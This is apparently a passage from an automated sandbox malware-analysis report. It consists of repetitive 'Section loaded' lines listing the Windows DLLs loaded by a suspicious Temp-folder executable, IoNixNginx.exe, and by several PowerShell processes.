Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: dxgi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: resourcepolicyclient.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: mf.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: mfplat.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: rtworkq.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: msmpeg2vdec.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: mfperfhelper.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: dxva2.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: msvproc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: dwmapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: ffmpeg.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: uiautomationcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: dwrite.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: secur32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: kbdus.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
